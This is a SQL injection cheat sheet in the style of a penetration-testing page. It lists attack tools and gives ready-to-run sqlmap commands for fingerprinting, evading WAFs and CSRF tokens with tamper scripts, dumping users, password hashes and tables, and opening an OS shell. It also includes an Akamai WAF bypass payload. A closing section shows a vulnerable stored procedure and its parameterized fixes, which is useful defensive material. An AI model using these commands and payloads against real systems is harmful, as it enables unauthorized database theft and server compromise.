SQL Injection

SQL Injection Wiki
SQL Injection CheatSheet

PowerShell Toolkit for Attacking SQL Server
SQL Injection with Code Execution in memory
Auto SQLmap
A Python Framework For NoSQL Scanning and Exploitation
Auto SQLi through google dorking
SQL Injection cheatsheet
Oracle Database Attacking Tool
Microsoft SQL Database Attacking Tool
SQL Vulnerability Scanner
MongoDB auditing and pentesting tool
PowerUpSQL: A PowerShell Toolkit for Attacking SQL Server

SQLMap

Clone from dev for bleeding edge:

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

Initial information about the injection

Fingerprinting (the request file is passed with -r; -u expects a URL):

./sqlmap.py -r <request-file> --fingerprint --dns-domain=dns.example.org

Get the database banner:

./sqlmap.py --url="<url>" --data="<post-data>" --banner

Get the current database user, current database, and hostname:

./sqlmap.py -r <request-file> --current-user --current-db --hostname

Run SQLMap via a request file

python sqlmap-dev/sqlmap.py -r login-request.txt

Sample request file (headers, a blank line, then the body with the injection placeholder):

POST /vuln.php HTTP/1.1
Host: www.target.com
User-Agent: Mozilla/4.0

id=%INJECT HERE%

Bypassing

Identify a WAF (--identify-waf was removed in newer sqlmap releases, where WAF detection runs automatically and --skip-waf turns it off):

./sqlmap.py -r <request-file> --identify-waf --safe-url=https://mail.google.com/inbox --user-agent=AGENT

Bypass CSRF protection (sqlmap fetches a fresh token from --csrf-url before each request):

./sqlmap.py -r <request-file> --csrf-url=https://www.gmail.com/login --csrf-token=CSRF_TOKEN

Tamper scripts (the script is named space2comment, not space2comments):

sqlmap.py -r reg.txt --level=3 --risk=3 -p keys --dbms=mysql --tamper=space2comment,randomcomments --proxy=http://localhost:8888

Checking Permissions

Check whether the current user is a DBA:

./sqlmap.py -r <request-file> --is-dba

Enumerate database users, password hashes, privileges, roles, and databases:

./sqlmap.py -r <request-file> --users --passwords --privileges --roles --dbs

Dumping Database

Enumerate databases:

./sqlmap.py -r <request-file> --dbs

Dump one column of one table:

./sqlmap.py -r <request-file> -D <db-name> -T <tbl-name> -C <col-name> --dump

List tables for one database:

./sqlmap.py -r <request-file> -D <db-name> --tables

List columns for one database (add -T <tbl-name> to restrict the listing to one table):

./sqlmap.py -r <request-file> -D <db-name> --columns

List the schema for one database:

./sqlmap.py -r <request-file> -D <db-name> --schema

Count the rows in each table of one database:

./sqlmap.py -r <request-file> -D <db-name> --count

Execute a SQL query:

./sqlmap.py -r <request-file> --sql-query="<sql-query>"

Prepend/append a string to every injected payload (--prefix and --suffix take payload fragments, not whole queries):

./sqlmap.py -r <request-file> --prefix="<sql-fragment>" --suffix="<sql-fragment>"

Get backdoor access to the SQL server; can give an OS shell when the database user has the required privileges:

./sqlmap.py -r <request-file> --os-shell

Run from file with threads:

python sqlmap-dev/sqlmap.py -r login-request.txt --threads=10

Run from file with threads and level:

python sqlmap-dev/sqlmap.py -r login-request.txt --level=5 --risk=3

Tampering

General tamper testing (pass the list as the --tamper option):

--tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes

MSSQL tamper testing:

--tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes

MySQL tamper testing:

--tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor

Bypassing

Akamai Kona Bypass

  • MID instead of SUBSTRING
  • LIKE instead of =
  • /**/ instead of a space
  • CURRENT_USER instead of CURRENT_USER()
  • " instead of '

Final example:

444/**/OR/**/MID(CURRENT_USER,1,1)/**/LIKE/**/"p"/**/#

Blogs

Stored Procedure

Stored procedures are only safe when they do not build dynamic SQL with EXEC(). If a procedure concatenates untrusted input into a string and runs it with EXEC(), it is vulnerable to SQL injection exactly as if you had executed the query manually.
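As an added example that is not from the original page, here is the pattern in T-SQL: a stored procedure that splices its argument into a string run by EXEC(), beside the same lookup rewritten with sp_executesql parameters, as a plain static statement, and with a catalog check plus QUOTENAME() for the one case (an identifier) that cannot be parameterized. The table dbo.users, its columns, and the procedure names are assumed.

```sql
-- Vulnerable: @name is spliced into the statement text, so a quote inside it
-- closes the string literal and whatever follows runs as SQL.
CREATE PROCEDURE dbo.FindUserUnsafe @name NVARCHAR(100)
AS
BEGIN
    DECLARE @sql NVARCHAR(MAX) =
        N'SELECT id, name FROM dbo.users WHERE name = ''' + @name + N'''';
    EXEC(@sql);
END;
GO

-- Hardened: the statement text is a constant and @name travels as a typed
-- parameter through sp_executesql, so its value cannot alter the query shape.
CREATE PROCEDURE dbo.FindUserSafe @name NVARCHAR(100)
AS
BEGIN
    DECLARE @sql NVARCHAR(MAX) =
        N'SELECT id, name FROM dbo.users WHERE name = @name';
    EXEC sp_executesql @sql, N'@name NVARCHAR(100)', @name = @name;
END;
GO

-- Preferred when the statement does not change: no dynamic SQL at all.
CREATE PROCEDURE dbo.FindUserStatic @name NVARCHAR(100)
AS
BEGIN
    SELECT id, name FROM dbo.users WHERE name = @name;
END;
GO

-- Identifiers cannot be parameters. If a table name really must vary, check it
-- against the catalog and quote it with QUOTENAME() before building the text.
CREATE PROCEDURE dbo.CountRowsSafe @table SYSNAME
AS
BEGIN
    IF OBJECT_ID(N'dbo.' + QUOTENAME(@table), N'U') IS NULL
        THROW 50000, N'unknown table', 1;
    DECLARE @sql NVARCHAR(MAX) =
        N'SELECT COUNT(*) FROM dbo.' + QUOTENAME(@table);
    EXEC sp_executesql @sql;
END;
GO
```

Reviewing procedures for EXEC() or sp_executesql calls whose first argument is built by string concatenation is the quickest way to find the injectable ones; a static statement or a parameterized sp_executesql call is the fix in each case.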